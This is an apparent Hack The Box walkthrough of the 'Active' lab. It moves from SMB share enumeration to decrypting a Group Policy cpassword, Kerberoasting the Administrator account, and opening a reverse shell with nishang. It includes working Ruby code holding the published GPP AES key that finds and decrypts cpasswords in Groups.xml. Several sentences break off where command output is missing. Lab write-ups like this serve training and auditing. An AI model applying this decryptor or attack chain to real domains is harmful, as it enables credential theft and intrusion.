Today I explore Active from HTB; an OSCP-like box featuring a great approach to SMB enumeration with SMBClient and CrackMapExec (cme). I started by running an AutoRecon scan which showed me
I have mentioned AutoRecon in (every) guide so look at my previous posts for more information.
SMBClient shows a share, Replication, available as Read. I use CME to verify:
CME shows I can read Replication with
I log in to SMBClient with the --no-pass flag and look around the directories. Eventually, I find Groups.xml which I pull to my local machine. Inside is a cpassword which I decrypted with the help of gpp-decrypt. For more information regarding cpasswords go HERE.
Finding Groups.xml and a password.
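What gpp-decrypt does with that cpassword, as an added example that is neither the post's code nor gpp-decrypt itself: the AES-256 key is the one Microsoft published for Group Policy Preferences (the reason MS14-025 removed the feature), so the decryption is the same sweep a defender runs over SYSVOL to find passwords left behind. The Groups.xml, user name and password below are constructed placeholders, not values from the box.

```ruby
require 'openssl'
require 'rexml/document'

# AES-256 key Microsoft published in MS-GPPREF section 2.2.1.1.4. It is identical in
# every domain, so a cpassword readable from SYSVOL is effectively plaintext.
GPP_KEY = ['4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b'].pack('H*')

def gpp_cipher(mode)
  c = OpenSSL::Cipher.new('AES-256-CBC')
  mode == :decrypt ? c.decrypt : c.encrypt
  c.key = GPP_KEY
  c.iv = "\0" * 16 # GPP uses an all-zero IV; PKCS#7 padding is OpenSSL's default
  c
end

# Restore the base64 padding GPP strips, AES-256-CBC decrypt, then decode the
# UTF-16LE plaintext. Raises on malformed base64, a bad length or bad padding.
def decrypt_cpassword(cpassword)
  ct = (cpassword + '=' * ((4 - cpassword.length % 4) % 4)).unpack1('m0')
  raise ArgumentError, 'ciphertext is not a whole number of AES blocks' unless ct.bytesize.positive? && (ct.bytesize % 16).zero?
  c = gpp_cipher(:decrypt)
  (c.update(ct) + c.final).force_encoding('UTF-16LE').encode('UTF-8')
end

# Inverse of the above (the form GPP wrote); used here only to build the sample.
def encrypt_cpassword(password)
  c = gpp_cipher(:encrypt)
  [c.update(password.encode('UTF-16LE')) + c.final].pack('m0').delete('=')
end

# Walk a Groups.xml and return { userName => password } for every cpassword attribute,
# the same sweep an administrator would run over SYSVOL to find leftover GPP passwords.
def find_cpasswords(xml)
  found = {}
  REXML::XPath.each(REXML::Document.new(xml), '//Properties[@cpassword]') do |p|
    found[p.attributes['userName']] = decrypt_cpassword(p.attributes['cpassword'])
  end
  found
end

# Constructed sample, not the file from the box: user and password are placeholders.
def sample_groups_xml
  cpw = encrypt_cpassword('Placeh0lderPassw0rd!')
  %(<Groups><User name="EXAMPLE\\svc_example"><Properties action="U" userName="EXAMPLE\\svc_example" cpassword="#{cpw}"/></User></Groups>)
end
```

Point find_cpasswords at a real Groups.xml (or the other GPP files that carry cpassword, such as Services.xml and ScheduledTasks.xml) to audit a domain's SYSVOL.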
Using the password found I use GetUserSPNs.py to find the Administrator hash. I crack this hash with the help of john to grab the
GetUserSPNs.py grabbing the Administrator account's hash.
Using the Administrator password alongside Invoke-PowerShellTCP.ps1 from nishang, I get a shell onto the box and root:
Using the Admin creds alongside Invoke-PowerShellTCP to launch a shell.
HTB Active proof (not clean) as the & param kept dropping the shell.